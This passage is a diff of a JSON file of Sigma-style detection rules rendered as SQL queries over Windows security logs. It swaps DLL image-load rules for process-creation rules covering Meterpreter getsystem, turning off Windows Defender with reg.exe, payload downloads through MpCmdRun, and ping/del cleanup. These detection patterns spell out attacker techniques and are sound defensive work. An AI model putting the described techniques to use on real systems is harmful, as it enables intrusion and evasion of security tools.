ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "status": "experimental", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Other security solution installers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", - "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1562.001" ], "falsepositives": [ - "Rarely observed" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' 